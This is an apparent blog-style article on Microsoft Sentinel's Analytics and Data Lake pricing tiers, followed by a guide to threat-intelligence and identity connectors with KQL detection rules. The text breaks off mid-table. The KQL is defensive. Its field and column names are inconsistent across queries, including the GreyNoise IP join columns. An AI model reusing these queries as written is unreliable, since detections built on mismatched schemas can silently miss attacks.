Understand New Sentinel Pricing Model with Sentinel Data Lake Tier
Introduction to Sentinel and Its New Pricing Model

Microsoft Sentinel is a cloud-native Security Information and Event Management (SIEM) and Security Orchestration, Automation, and Response (SOAR) platform that collects, analyzes, and correlates security data from across your environment to detect threats and automate response. Traditionally, Sentinel stored all ingested data in the Analytics tier (Log Analytics workspace), which is powerful but expensive for high-volume logs. To reduce cost and enable customers to retain all security data without compromise, Microsoft introduced a new dual-tier pricing model consisting of the Analytics tier and the Data Lake tier. The Analytics tier continues to support fast, real-time querying and analytics for core security scenarios, while the new Data Lake tier provides very low-cost storage for long-term retention and high-volume datasets. Customers can now choose where each data type lands: analytics for high-value detections and investigations, and data lake for large or archival types. This lets organizations significantly lower cost while still retaining all their security data for analytics, compliance, and hunting.

The flow diagram below depicts the new Sentinel pricing model.

Now let's understand this new pricing model through the scenarios below:
- Scenario 1A (Pay-As-You-Go)
- Scenario 1B (Usage Commitment)
- Scenario 2 (Data Lake Tier Only)

Scenario 1A (Pay-As-You-Go)

Requirement: Suppose you need to ingest 10 GB of data per day, and you must retain that data for 2 years. However, you will only frequently use, query, and analyze the data for the first 6 months.

Solution: To optimize cost, you can ingest the data into the Analytics tier and retain it there for the first 6 months, where active querying and investigation happen. After that period, the remaining 18 months of retention can be shifted to the Data Lake tier, which provides low-cost storage for compliance and auditing needs. Note that you will be charged separately for Data Lake tier querying and analytics, depicted as Compute (D) in the pricing flow diagram.

Pricing Flow / Notes
- The first 10 GB/day ingested into the Analytics tier is free for 31 days under the Analytics logs plan.
- All data ingested into the Analytics tier is automatically mirrored to the Data Lake tier at no additional ingestion or retention cost.
- For the first 6 months, you pay only for Analytics tier ingestion and retention, excluding any free capacity.
- For the next 18 months, you pay only for Data Lake tier retention, which is significantly cheaper.

Azure Pricing Calculator Equivalent

Assuming no data is queried or analyzed during the 18-month Data Lake tier retention period: although the Analytics tier retention is set to 6 months, the first 3 months of retention fall under the free retention limit, so retention charges apply only for the remaining 3 months of the analytics retention window. The Azure pricing calculator adjusts accordingly.

Scenario 1B (Usage Commitment)

Now suppose you are ingesting 100 GB per day. If you follow the same pay-as-you-go pricing model described above, your estimated cost would be approximately $15,204 per month. However, you can reduce this cost by choosing a Commitment Tier, where Analytics tier ingestion is billed at a discounted rate. Note that the discount applies only to Analytics tier ingestion; it does not apply to Analytics tier retention costs or to any Data Lake tier-related charges. Please refer to the pricing flow and the equivalent pricing calculator results shown below.
Monthly cost savings: $15,204 – $11,184 = $4,020 per month.

Now the question is: what happens if your usage reaches 150 GB per day? Will the additional 50 GB be billed at the pay-as-you-go rate? No. The entire 150 GB/day will still be billed at the discounted rate associated with the 100 GB/day commitment tier bucket.

Azure Pricing Calculator Equivalent (100 GB/day)
Azure Pricing Calculator Equivalent (150 GB/day)

Scenario 2 (Data Lake Tier Only)

Requirement: Suppose you need to store certain audit or compliance logs amounting to 10 GB per day. These logs are not used for querying, analytics, or investigations on a regular basis, but must be retained for 2 years per your organization's compliance or forensic policies.

Solution: Since these logs are not actively analyzed, you should avoid ingesting them into the Analytics tier, which is more expensive and optimized for active querying. Instead, send them directly to the Data Lake tier, where they can be retained cost-effectively for future audit, compliance, or forensic needs.

Pricing Flow: Because the data is ingested directly into the Data Lake tier, you pay both ingestion and retention costs there for the entire 2-year period. If, at any point in the future, you need to perform advanced analytics, querying, or search, you will incur additional compute charges based on actual usage. Even with occasional compute charges, the cost remains significantly lower than storing the same data in the Analytics tier.

Realized Savings

Scenario 1 (10 GB/day in Analytics tier): $1,520.40 per month
Scenario 2 (10 GB/day directly into Data Lake tier): $202.20 per month without compute; $257.20 per month with a sample compute price

Savings with no compute activity: $1,520.40 – $202.20 = $1,318.20 per month
Savings with some compute activity (sample value): $1,520.40 – $257.20 = $1,263.20 per month

Azure calculator equivalent without compute
Azure calculator equivalent with sample compute

Conclusion

The combination of the Analytics tier and the Data Lake tier in Microsoft Sentinel enables organizations to optimize cost based on how their security data is used. High-value logs that require frequent querying, real-time analytics, and investigation can be stored in the Analytics tier, which provides powerful search performance and built-in detection capabilities. At the same time, large-volume or infrequently accessed logs, such as audit, compliance, or long-term retention data, can be directed to the Data Lake tier, which offers dramatically lower storage and ingestion costs. Because all Analytics tier data is automatically mirrored to the Data Lake tier at no extra cost, customers can use the Analytics tier only for the period they actively query data, and rely on the Data Lake tier for the remaining retention. This tiered model allows different scenarios (active investigation, archival storage, compliance retention, or large-scale telemetry ingestion) to be handled at the most cost-effective layer, ultimately delivering substantial savings without sacrificing visibility, retention, or future analytical capabilities.
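A practical footnote to the scenarios above: before choosing between pay-as-you-go and a commitment tier, it helps to measure your actual daily billable ingestion. A minimal KQL sketch you can run in your Log Analytics workspace; the 30-day window and the GB conversion are illustrative choices, not part of the pricing model itself:

Usage
| where TimeGenerated > ago(30d)
| where IsBillable == true
// Quantity is reported in MB; convert to GB per day
| summarize IngestedGB = round(sum(Quantity) / 1024, 2) by bin(TimeGenerated, 1d)
| order by TimeGenerated asc

Averaging the daily totals shows which commitment tier bucket (e.g. 100 GB/day) your workspace would fall into.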
Threat Intelligence & Identity Ecosystem Connectors

Microsoft Sentinel's capability can be greatly enhanced by integrating third-party threat intelligence (TI) feeds (e.g. GreyNoise, Team Cymru) with identity and access logs (e.g. OneLogin, PingOne). This article provides a detailed dive into each connector, its data types, and best practices for enrichment and false-positive reduction. We cover how GreyNoise, Team Cymru (including PureSignal Scout), OneLogin IAM, PingOne, and Keeper integrate with Sentinel, including available connectors, ingested schemas, and configuration. We then outline technical patterns for building TI-based lookup pipelines, scoring, and suppression rules to filter benign noise (e.g. GreyNoise's known scanners), and enrich alerts with context from identity logs. We map attack chains (credential stuffing, lateral movement, account takeover) to Sentinel data, and propose KQL analytics rules and playbooks with MITRE ATT&CK mappings (e.g. T1110: Brute Force, T1595: Active Scanning). The report also includes deployment guidance, performance considerations for high-volume TI ingestion, and a comparison of connector features. A flowchart illustrates the data flow from TI and identity sources into Sentinel analytics. All recommendations are drawn from official documentation and industry sources.

Threat Intel & Identity Connectors Overview

GreyNoise (TI Feed): GreyNoise provides "internet background noise" intelligence on IPs seen scanning or probing the Internet. The Sentinel GreyNoise Threat Intelligence connector (Azure Marketplace) pulls data via GreyNoise's API into Sentinel's ThreatIntelligenceIndicator table. It uses a daily Azure Function to fetch indicators (IP addresses and metadata like classification, noise, last_seen) and injects them as STIX-format indicators (network IPs with provider "GreyNoise"). This feed can then be queried in KQL. Authentication requires a GreyNoise API key and a Sentinel workspace app with Contributor rights. GreyNoise's goal is to help "filter out known opportunistic traffic" so analysts can focus on real threats. Official docs describe deploying the content pack and workbook template.

Ingested data: IP-based indicators (malicious vs. benign scans), classifications (noise, riot, etc.), organization names, last-seen dates. All fields from GreyNoise's IP lookup (e.g. classification, last_seen) appear in ThreatIntelligenceIndicator as NetworkDestinationIP, IndicatorProvider="GreyNoise", and related fields. Query:

ThreatIntelligenceIndicator
| where IndicatorProvider == "GreyNoise"
| summarize arg_max(TimeGenerated, *) by NetworkDestinationIP

This yields the latest GreyNoise record per IP.

Team Cymru Scout (TI Context): Team Cymru's PureSignal™ Scout is a TI enrichment platform. The Team Cymru Scout connector (via Azure Marketplace) ingests contextual data (not raw logs) about IPs, domains, and account usage into Sentinel custom tables. It runs via an Azure Function that, given IP or domain inputs, populates tables like Cymru_Scout_IP_Data_* and Cymru_Scout_Domain_Data_CL. For example, an IP query yields multiple tables: Cymru_Scout_IP_Data_Foundation_CL, ..._OpenPorts_CL, ..._PDNS_CL, etc., containing open ports, passive DNS history, X.509 certificate info, fingerprint data, and more. This feed requires a Team Cymru account (username/password) to access the Scout API. Data types: structured TI metadata by IP/domain. There is no native ThreatIndicator insertion; instead, analysts query these tables to enrich events (e.g. join on SourceIP, as sketched below).
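As an illustration, a hedged sketch of such an enrichment join. The Cymru_Scout_IP_Data_Foundation_CL table name comes from the connector description above, but the column names (IP_s, ASName_s, CountryCode_s) are assumptions and should be adjusted to your actual schema:

// Hedged sketch: enrich OneLogin sign-in events with Team Cymru Scout IP context.
// Scout column names (IP_s, ASName_s, CountryCode_s) are assumptions; verify them first.
OneLoginEventsV2_CL
| extend SourceIP = tostring(ClientIP_s)
| join kind=leftouter (
    Cymru_Scout_IP_Data_Foundation_CL
    | project IP = tostring(IP_s), ASName = tostring(ASName_s), Country = tostring(CountryCode_s)
) on $left.SourceIP == $right.IP
| project TimeGenerated, SourceIP, ASName, Country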
The Sentinel Tech Community notes that Scout "enriches alerts with real-time context on IPs, domains, and adversary infrastructure" and can help "reduce false positives".

OneLogin IAM (Identity Logs): The OneLogin IAM solution (Microsoft Sentinel content pack) ingests OneLogin platform events and user info via OneLogin's REST API. Using the Codeless Connector Framework, it pulls from OneLogin's Events API and Users API, storing data in custom tables OneLoginEventsV2_CL and OneLoginUsersV2_CL. Typical events include user sign-ins, MFA actions, app accesses, admin changes, etc. Prerequisites: create an OpenID Connect app in OneLogin (for client ID/secret) and register it in Azure (Global Admin). The connector queries hourly (or on a schedule), within OneLogin's rate limit of 5,000 calls/hour. Data mapping: OneLoginEventsV2_CL (the _CL suffix indicates a custom log) holds event records (time, user, IP, event type, result, etc.); OneLoginUsersV2_CL contains user account attributes. These can be joined or used in analytics. For example, a query might look for failed login events:

OneLoginEventsV2_CL
| where Event_type_s == "UserSessionStart" and Result_s == "Failed"

(Actual field names depend on the schema.)

PingOne (Identity Logs): The PingOne Audit connector ingests audit activity from the PingOne identity platform via its REST API. It creates the table PingOne_AuditActivitiesV2_CL. This includes administrator actions, user logins, console events, etc. You configure a PingOne API client (client ID/secret) and set up the Codeless Connector Framework. Logs are retrieved (with attention to PingOne's license-based rate limits) and appended to the custom table. Analysts can query, for instance, PingOne_AuditActivitiesV2_CL for events like MFA failures or profile changes.

Keeper (Password Vault Logs – optional): Keeper, a password management platform, can forward security events to Sentinel via Azure Monitor. As of the latest docs, logs are sent to a custom log table (commonly KeeperLogs_CL) using Azure Data Collection Rules. In Keeper's guide, you register an Azure AD app ("KeeperLogging") and configure Azure Monitor data collection; then in the Keeper Admin Console you specify the DCR endpoint. Keeper events (e.g. user logins, vault actions, admin changes) are ingested into the table named (e.g.) Custom-KeeperLogs_CL. Authentication uses the app's client ID/secret and a monitor endpoint URL. This is a bulk ingest of records, rather than a scheduled pull. Data ingested: custom Keeper events with fields like user, action, timestamp. Keeper's integration is essentially via Azure Monitor (in the older Azure Sentinel approach).

Connector Configuration & Data Ingestion

Authentication and Rate Limits: Most connectors require API keys or OAuth credentials. GreyNoise and Team Cymru use single keys/credentials, with the Azure Function secured by a Managed Identity. OneLogin and PingOne use a client ID/secret and must respect their API limits (OneLogin roughly 5,000 calls/hour; PingOne depends on licensing). GreyNoise's enterprise API allows bulk lookups; the community API is limited (10/day for free), so production integration requires an Enterprise plan.

Sentinel Tables: Data is inserted either into built-in tables or custom tables. GreyNoise feeds the ThreatIntelligenceIndicator table, populating fields like NetworkDestinationIP and ThreatSeverity (higher if classified "malicious"). Team Cymru's Scout connector creates many Cymru_Scout_*_CL tables. OneLogin's solution populates OneLoginEventsV2_CL and OneLoginUsersV2_CL.
PingOne yields PingOne_AuditActivitiesV2_CL. Keeper logs appear in a custom table (e.g. KeeperLogs_CL) as shown in Keeper's guide. Note: Sentinel's built-in identity tables (IdentityInfo, SigninLogs) are typically for Microsoft identities; third-party logs can be mapped to them via parsers or custom analytic rules, but by default they arrive in these custom tables.

Data Types & Schema:
- Threat Indicators: In ThreatIntelligenceIndicator, GreyNoise IPs appear as NetworkDestinationIP with associated fields (e.g. ThreatSeverity, IndicatorProvider="GreyNoise", ConfidenceScore). (Future STIX tables may be used after 2025.)
- Custom CL Logs: OneLogin events may include fields such as user_id_s, user_login_s, client_ip_s, event_time, etc. (The published parser issues indicate fields like app_name_s, role_id_d, etc.) PingOne logs include eventType, user, clientIP, result. Keeper logs contain Action, UserName, etc. These raw fields can be normalized in analytic rules or parsed by data transformations.
- Identity Info: Although not directly ingested, identity attributes from OneLogin/PingOne (e.g. user roles, group IDs) could be periodically fetched and synced to Sentinel (via custom logic) to populate IdentityInfo records, aiding user-centric hunts.

Configuration Steps:
- GreyNoise: In the Sentinel Content Hub, install the GreyNoise ThreatIntel solution. Enter your GreyNoise API key when prompted. The solution deploys an Azure Function (requires write access to Functions) and sets up an ingestion schedule. Verify that the ThreatIntelligenceIndicator table is receiving GreyNoise entries.
- Team Cymru: From the Marketplace, install "Team Cymru Scout". Provide Scout credentials. The solution creates an Azure Function app and defines a workflow to ingest or look up IPs/domains. (Often, analysts trigger lookups rather than scheduled ingestion, since Scout is lookup-based.) Ensure roles: the Function's managed identity needs Sentinel Contributor rights.
- OneLogin: Use the Data Connectors UI. Authenticate OneLogin by creating a new Sentinel Web API authentication (with OneLogin's client ID/secret). Enable both "OneLogin Events" and "OneLogin Users". No agent is needed. After setup, data flows into OneLoginEventsV2_CL.
- PingOne: Similarly, configure the PingOne connector. Use the PingOne administrative console to register an OAuth client. In Sentinel's connector blade, enter the client ID/secret and specify the desired log types (Audit, possibly IdP logs). Confirm that PingOne_AuditActivitiesV2_CL populates hourly.
- Keeper: Register an Azure AD app ("KeeperLogging") and assign it Monitoring roles (Publisher/Contributor) on your workspace and data collection endpoint. Create an Azure Data Collection Rule (DCR) and table (e.g. KeeperLogs_CL). In Keeper's Admin Console (Reporting & Alerts → Azure Monitor), enter the tenant ID, client ID/secret, and the DCR endpoint URL (format: https://<DCE>/dataCollectionRules/<DCR_ID>/streams/<table>?api-version=2023-01-01). Keeper will then push logs.

KQL Lookup: To enrich a Sentinel event with these feeds, you might write:

OneLoginEventsV2_CL
| where EventType == "UserLogin" and Result == "Success"
| extend UserIP = ClientIP_s
| join kind=inner (
    ThreatIntelligenceIndicator
    | where IndicatorProvider == "GreyNoise" and ThreatSeverity >= 3
    | project NetworkDestinationIP, Category
) on $left.UserIP == $right.NetworkDestinationIP

This joins OneLogin sign-ins with GreyNoise's list of malicious scanners.
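A similar lookup works against the PingOne audit table. A minimal sketch for surfacing repeated MFA or login failures; the field names (EventType_s, Outcome_s, User_s, SourceIP_s) follow the queries later in this article but are assumptions to check against your actual schema, and the threshold is an illustrative choice:

PingOne_AuditActivitiesV2_CL
| where TimeGenerated > ago(24h)
// Field names and event-type values are assumptions; inspect a sample row to confirm
| where EventType_s == "UserMFAFailure" or (EventType_s == "UserLogin" and Outcome_s == "Failed")
| summarize Failures = count() by User_s, ClientIP = tostring(SourceIP_s)
| where Failures >= 3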
Enrichment & False-Positive Reduction

IOC Enrichment Pipelines: A robust TI pipeline in Sentinel often uses lookup tables and functions. For example, ingested TI (from GreyNoise or Team Cymru) can be stored in reference data or scheduled lookup tables to enrich incoming logs. Patterns include:
- Normalization: Normalize diverse feeds into common STIX schema fields (e.g. all IPs to NetworkDestinationIP, all domains to DomainName) so rules can treat them uniformly.
- Confidence Scoring: Assign a confidence score to each indicator (from the vendor or based on recency/frequency). For GreyNoise, for instance, you might use classification (e.g. "malicious" vs. "benign") and history to score IP reputation. In Sentinel's ThreatIntelligenceIndicator.ConfidenceScore field you can set values (higher for high-confidence IOCs, lower for noisy ones).
- TTL & Freshness: Some indicators (e.g. active C2 domains) expire, so setting a time-to-live is critical. Sentinel ingestion rules or parsers should use ExpirationDateTime or ValidUntil on indicators to avoid stale IOCs. For example, extend ValidUntil only if confidence is high.
- Conflict Resolution: When the same IOC comes from multiple sources (e.g. an IP in both GreyNoise and Team Cymru), you can either merge metadata or choose the highest confidence. One approach: use the highest threat severity from any source. Sentinel's ThreatType tags (e.g. malicious-traffic) can accommodate multiple providers.

False-Positive Reduction Techniques:
- GreyNoise Noise Scoring: GreyNoise's primary utility is filtering. If an IP is labeled noise=true (i.e. just scanning, not actively malicious), rules can deprioritize alerts involving that IP, e.g. suppress an alert if its source IP appears in GreyNoise as a benign scanner.
- Team Cymru Reputation: Use Scout data to gauge risk; e.g. if an IP's open-port fingerprint or domain history shows no malicious tags, it may be low-risk. Conversely, a known hostile IP (e.g. one seen in ransomware networks) should raise the alert level. Scout's thousands of context tags help refine a binary IOC.
- Contextual Identity Signals: Leverage OneLogin/PingOne context to filter alerts. For instance, if a sign-in event is associated with a high-risk location (e.g. a new country) and the IP is a GreyNoise scanner, flag it. If an IP is marked benign, drop or suppress. Correlate login failures: if a single IP causes many failures across multiple users, it might be credential stuffing (T1110); but if that IP is a known benign scanner, consider it low priority.
- Thresholding & Suppression: Build analytic suppression rules. Example: only alert on >5 failed logins in 5 minutes from an IP, and only when that IP is not noise. Or ignore DNS queries to domains that TI flags as benign/whitelisted. Apply tag-based rules: some connectors allow tagging known internal assets or trusted scan ranges to avoid alerts.

Use GreyNoise to suppress alerts:

SecurityEvent
| where EventID == 4625 and Account != "SYSTEM"
| join kind=leftanti (
    ThreatIntelligenceIndicator
    | where IndicatorProvider == "GreyNoise" and Classification == "benign"
    | project NetworkSourceIP
) on $left.IPAddress == $right.NetworkSourceIP

This rule filters out Windows 4625 login failures originating from GreyNoise-known benign scanners.

Identity Attack Chains & Detection Rules

Modern account attacks often involve sequential activities. By combining identity logs with TI, we can detect advanced patterns. Below are common chains and rule ideas:

Credential Stuffing (MITRE T1110): Often seen as many login failures followed by a success.
Detection: Look for multiple failed OneLogin/PingOne sign-ins for the same or different accounts from a single IP, then a success. Enrich with GreyNoise: if the source IP is in GreyNoise (indicating scanning), raise the severity. Rule:

let SuspiciousIP = OneLoginEventsV2_CL
| where EventType == "UserSessionStart" and Result == "Failed"
| summarize CountFailed=count() by ClientIP_s
| where CountFailed > 5;
OneLoginEventsV2_CL
| where EventType == "UserSessionStart" and Result == "Success" and ClientIP_s in (SuspiciousIP | project ClientIP_s)
| join kind=inner (
    ThreatIntelligenceIndicator
    | where ThreatType == "ip"
    | extend GreyNoiseClass = tostring(Classification)
    | project IP=NetworkSourceIP, GreyNoiseClass
) on $left.ClientIP_s == $right.IP
| where GreyNoiseClass == "malicious"
| project TimeGenerated, Account_s, ClientIP_s, GreyNoiseClass

Tactics: Initial Access (T1110) – Severity: High.

Account Takeover / Impossible Travel (T1078: Valid Accounts): Sign-ins from unusual geographies or devices.
Detection: Compare the user's current sign-in location against a historical baseline. Use OneLogin/PingOne logs: if two logins by the same user occur in different countries with insufficient time to travel between them, trigger. Enrich: if the login IP is also known adversary infrastructure (Team Cymru PDNS, etc.), raise the alert. Rule:

PingOne_AuditActivitiesV2_CL
| where TimeGenerated > ago(24h)
| where EventType_s == "UserLogin"
| extend loc = strcat(tostring(City_s), ", ", tostring(Country_s))
// Flag users seen in more than one location within a one-hour span
| summarize Locations = dcount(loc), LocationSet = make_set(loc),
            FirstSeen = min(TimeGenerated), LastSeen = max(TimeGenerated) by User_s
| where Locations > 1 and LastSeen - FirstSeen < 1h
| project User_s, LocationSet, FirstSeen, LastSeen

(This simplified query flags users seen in multiple locations in under 1 hour.)

Tactics: Initial Access – Severity: Medium.

Lateral Movement (T1021): Use of one account on multiple systems/apps.
Detection: Two or more distinct application/service authentications by the same user within a short time. Use OneLogin app-id fields or audit logs for access. If these are followed by suspicious network activity (e.g. contacting C2 infrastructure flagged by GreyNoise), escalate.
Tactics: Lateral Movement – Severity: High.

Privilege Escalation (T1098): An admin account is changed or MFA factors are reset in OneLogin/PingOne, especially after an anomalous login.
Detection: Monitor OneLogin admin events ("User updated", "MFA enrolled/removed"). Cross-check the actor's IP against threat feeds.
Tactics: Persistence / Privilege Escalation – Severity: High.

Analytics Rules (KQL)

Below are six illustrative Sentinel analytics rules combining TI and identity logs. Each rule shows its logic, tactics, severity, and MITRE IDs. (Adjust field names per your schemas and normalize the CL tables as needed.)

1. Multiple Failed Logins from Malicious Scanner (T1110) – High severity. Detect credential stuffing by identifying >5 failed login attempts from the same IP, where that IP is classified as malicious by GreyNoise.
let BadIP = OneLoginEventsV2_CL
| where EventType == "UserSessionStart" and Result == "Failed"
| summarize attempts=count() by SourceIP_s
| where attempts >= 5;
OneLoginEventsV2_CL
| where EventType == "UserSessionStart" and Result == "Success" and SourceIP_s in (BadIP | project SourceIP_s)
| join kind=inner (
    ThreatIntelligenceIndicator
    | where IndicatorProvider == "GreyNoise" and ThreatSeverity >= 4
    | project MaliciousIP=NetworkDestinationIP
) on $left.SourceIP_s == $right.MaliciousIP
| extend AttackFlow="CredentialStuffing", MITRE="T1110"
| project TimeGenerated, UserName_s, SourceIP_s, MaliciousIP, AttackFlow, MITRE

Logic: Correlate failed-then-successful logins from the same IP plus a GreyNoise "malicious" classification.

2. Impossible Travel / Anomalous Geo (T1078) – Medium severity. A user signs in from two distant locations within an hour.

// Compare each user's earliest and latest successful logins in the window.
// Latitude_d/Longitude_d are assumed numeric fields; adjust to your schema.
let lastLogins = PingOne_AuditActivitiesV2_CL
| where TimeGenerated > ago(24h)
| where EventType_s == "UserLogin" and Outcome_s == "Success"
| summarize arg_max(TimeGenerated, Country_s, Latitude_d, Longitude_d) by User_s
| project User_s, LastTime=TimeGenerated, LastCountry=Country_s, LastLat=Latitude_d, LastLon=Longitude_d;
let prevLogins = PingOne_AuditActivitiesV2_CL
| where TimeGenerated > ago(24h)
| where EventType_s == "UserLogin" and Outcome_s == "Success"
| summarize arg_min(TimeGenerated, Country_s, Latitude_d, Longitude_d) by User_s
| project User_s, PrevTime=TimeGenerated, PrevCountry=Country_s, PrevLat=Latitude_d, PrevLon=Longitude_d;
lastLogins
| join kind=inner prevLogins on User_s
// geo_distance_2points takes (longitude1, latitude1, longitude2, latitude2) and returns meters
| extend DistKm = geo_distance_2points(LastLon, LastLat, PrevLon, PrevLat) / 1000
| where DistKm > 1000 and (LastTime - PrevTime) < 1h
| project Time=LastTime, User=User_s, From=PrevCountry, To=LastCountry, DistKm, MITRE="T1078"

Logic: Compute the geographic distance between the two logins; flag if too far, too fast.

3. Suspicious Admin Change (T1098) – High severity. Detect a change to admin settings (like a role assignment or MFA reset) via PingOne, from a high-risk IP (Team Cymru or GreyNoise) or after failed logins.

PingOne_AuditActivitiesV2_CL
| where EventType_s in ("UserMFAReset", "UserRoleChange") // example admin events
| extend ActorIP = tostring(InitiatingIP_s)
| join kind=inner (
    ThreatIntelligenceIndicator
    | where ThreatSeverity >= 3
    | project BadIP=NetworkDestinationIP
) on $left.ActorIP == $right.BadIP
| extend MITRE="T1098"
| project TimeGenerated, ActorUser_s, Action=EventType_s, ActorIP

Logic: Raise an alert if an admin action originates from a known bad IP.

4. Malicious Domain Access (T1071) – Medium severity. Internal logs (e.g. DNS or web proxy) show access to a domain listed by Team Cymru Scout as C2 or reconnaissance.

// Adjust the DNS table and column names to your environment (e.g. DnsEvents)
DeviceDnsEvents
| where QueryType == "A"
| join kind=inner (
    Cymru_Scout_Domain_Data_CL
    | where ThreatTag_s == "Command-and-Control"
    | project DomainName_s
) on $left.QueryText == $right.DomainName_s
| extend MITRE="T1071"
| project TimeGenerated, DeviceName, QueryText

Logic: Correlate internal DNS queries with Scout's flagged C2 domains. (Requires that domain data is ingested or synced.)

5. Brute Force Blocked at Firewall (T1110) – Low to Medium severity. Firewall logs show an IP blocked for many attempts, and that IP is not listed as benign noise by GreyNoise (i.e. it is likely a malicious scanner).
AzureDiagnostics
| where Category == "NetworkSecurityGroupFlowEvent" and msg_s contains "DIRECTION=Inbound" and Action_s == "Deny"
| summarize attemptCount=count() by IP = SourceIp_s, FlowTime=bin(TimeGenerated, 1h)
| where attemptCount > 50
| join kind=leftanti (
    ThreatIntelligenceIndicator
    | where IndicatorProvider == "GreyNoise" and Classification == "benign"
    | project NoiseIP=NetworkDestinationIP
) on $left.IP == $right.NoiseIP
| extend MITRE="T1110"
| project IP, attemptCount, FlowTime

Logic: Many inbound denies (possible brute force) from an IP not whitelisted by GreyNoise.

6. New Device Enrolled (T1078) – Low severity. A user enrolls a new device or location for MFA after an unusual login.

OneLoginEventsV2_CL
| where EventType == "NewDeviceEnrollment"
| join kind=inner (
    OneLoginEventsV2_CL
    | where EventType == "UserSessionStart" and Result == "Success"
    // Take the earliest successful login per user as the prior login
    | summarize arg_min(TimeGenerated, ClientIP_s) by User_s
    | project User_s, loginTime=TimeGenerated, loginIP=ClientIP_s
) on User_s
| where loginIP != DeviceIP_s
| extend MITRE="T1078"
| project TimeGenerated, User_s, DeviceIP_s, loginIP

Logic: Flag if a new device is added from a different IP than the user's prior login (possible evidence of account compromise).

Note: The above rules are illustrative. Tune threshold values (e.g. attempt counts) to your environment. Map the event fields (EventType, Result, etc.) to your actual schema. Use severity mapping in the rule configs as indicated and tag rules with MITRE IDs for context.

TI-Driven Playbooks and Automation

Automated response can amplify TI. Patterns include:
- IOC Blocking: On alert (e.g. a suspicious IP login), an automation runbook can call Azure Firewall, Azure Defender, or external firewall APIs to block the offending IP. For instance, a Logic App could trigger on the analytic alert, take the TI feed IP, and call Azure Firewall network rule PowerShell cmdlets to add a deny rule.
- Enrichment Workflow: After an alert triggers, an Azure Logic App playbook can enrich the incident by querying TI APIs. E.g., given an IP from the alert, call the GreyNoise API or the Team Cymru Scout API in real time (via an HTTP action), add the classification to the incident details, and tag the incident accordingly (e.g. GreyNoiseStatus: malicious). This adds context for the analyst.
- Alert Suppression: Implement playbook-driven suppression. For example, an alert triggered by an external IP can invoke a playbook that checks GreyNoise; if the IP is benign, the playbook can auto-close the alert or mark it as a false positive, reducing analyst load.
- Automated TI Feed Updates: Periodically fetch open-source or commercial TI and use a playbook to push new indicators into Sentinel's TI store via the Graph API.
- Incident Enrichment: On incident creation, a playbook could query OneLogin/PingOne for additional user details (like department or location via their APIs) and add them as a note in the incident.

Performance, Scalability & Costs

TI feeds and identity logs can be high-volume. Key considerations:
- Data Ingestion Costs: Every log and TI indicator ingested into Sentinel is billable by the GB. Bulk TI indicator ingestion (like GreyNoise pulling thousands of IPs per day) can add storage costs. Use Sentinel's Data Collection Rules (DCR) to apply ingestion-time filters (e.g. only store indicators above a confidence threshold) to reduce volume. The GreyNoise feed is typically modest (daily, perhaps thousands of IPs). Identity log volume (OneLogin/PingOne) depends on org size and could be megabytes per day. Use Sentinel ingestion-time and analytic filters to drop low-value logs.
- Query Performance: Custom log tables (OneLogin, PingOne, KeeperLogs_CL) can grow large. Periodically archive old data (e.g. export data older than 90 days to storage, then purge). Use materialized views or scheduled summary tables for heavy queries (e.g. pre-aggregate hourly login counts). For threat indicator tables, leverage the built-in indices on IndicatorId and NetworkIP for fast joins. Use project-away _* to remove hidden metadata columns from large join queries.
- Retention & Storage: Configure retention per table. If historical TI is less needed, set shorter retention. Use Azure Monitor's tiering/archive for seldom-used data. For large TI volumes (e.g. feeding multiple TIPs), consider using the Sentinel Data Lake (or connecting Log Analytics to ADLS Gen2) to offload raw ingest cheaply.
- Scale-Out Architecture: For very large environments, use multiple Sentinel workspaces (e.g. regional) and aggregate logs via Azure Lighthouse or Sentinel Fusion. TI feeds can be shared: one workspace collects TI, then distributes to others via Sentinel's TI management (feeds can be published and shared cross-workspace).
- Connector Limits: API rate limits dictate update frequency. Schedule connectors accordingly (e.g. daily for TI, hourly for identity events). Avoid hourly pulls of largely static data (a users list can be refreshed daily). For OneLogin/PingOne, use incremental tokens or webhooks if possible to reduce load.
- Monitoring Health: Use Sentinel's Log Analytics and Monitor metrics to track ingestion volume and connector errors. For example, monitor the Functions running GreyNoise/Scout for failures or throttling.

Deployment Checklist & Guide

1. Prepare Sentinel Workspace: Ensure a Log Analytics workspace with Sentinel enabled. Record the workspace ID and region.
2. Register Applications: In Azure AD, create and note any service principal needed for functions or connectors (e.g. a Sentinel-managed identity for Functions). In each vendor portal, register API apps and credentials (OneLogin OIDC app, PingOne API client, Keeper AD app).
3. Network & Security: If needed, configure firewall rules to allow outbound access to vendor APIs.
4. Install Connectors: In the Sentinel Content Hub or Marketplace, install the solutions for GreyNoise TI, Team Cymru Scout, OneLogin IAM, and PingOne. Follow each wizard to input credentials. Verify that the "Data Types" (logs, alerts, etc.) are enabled.
5. Create Tables & Parsers (if manual): For Keeper or unsupported logs, manually create custom tables (via DCR in the Azure portal). Import JSON to define fields as shown in Keeper's docs.
6. Test Data Flow: After each setup, wait 1–24 hours and run a simple query on the destination table (e.g. OneLoginEventsV2_CL | take 5) to confirm ingestion (see also the health-check sketch after this list).
7. Deploy Ingestion Rules: Use Sentinel threat intelligence ingestion rules to fine-tune feeds (e.g. mark high-confidence feeds to extend expiration). Optionally tag or whitelist known-good indicators.
8. Configure Analytics: Enable or create rules using the KQL above. Place them in the correct threat hunting or incident rule categories (Credential Access, Lateral Movement, etc.). Assign appropriate alert severity.
9. Set up Playbooks: For automated actions (alert enrichment, IOC blocking), create Logic App playbooks. Test with mock alerts (dry run) to ensure correct API calls.
10. Tuning & Baseline: After initial alerts, tune queries (thresholds, whitelists) to reduce noise. Maintain suppression lists (e.g. internal pentest IPs). Use the MITRE mapping in rule details for clarity.
11. Documentation & Training: Document field mappings (e.g. OneLoginEvents fields), and train SOC staff on the new TI-enriched alert fields.
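As a quick health check after deployment, a minimal sketch that confirms each table is receiving data. The table names are the ones cited in this article; isfuzzy=true tolerates any table that does not exist yet in your workspace:

union isfuzzy=true OneLoginEventsV2_CL, PingOne_AuditActivitiesV2_CL, KeeperLogs_CL
| summarize LastRecord = max(TimeGenerated), RecordCount = count() by Type
| order by LastRecord desc

The built-in Type column carries the table name, so one result row per table shows its latest record and volume.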
Connectors Comparison

GreyNoise
- Data sources: IP intelligence (scanners)
- Sentinel tables: ThreatIntelligenceIndicator
- Update frequency: Daily (scheduled pull)
- Auth method: API key
- Key fields enriched: IP classification, noise flag
- Limits/cost: API key required; paid license for large usage
- Pros: Filters benign scans; broad scan visibility. Cons: Only IP-based (no domain/file indicators).

Team Cymru Scout
- Data sources: Global IP/domain telemetry
- Sentinel tables: Cymru_Scout_*_CL (custom tables)
- Update frequency: On-demand or daily
- Auth method: Account credentials
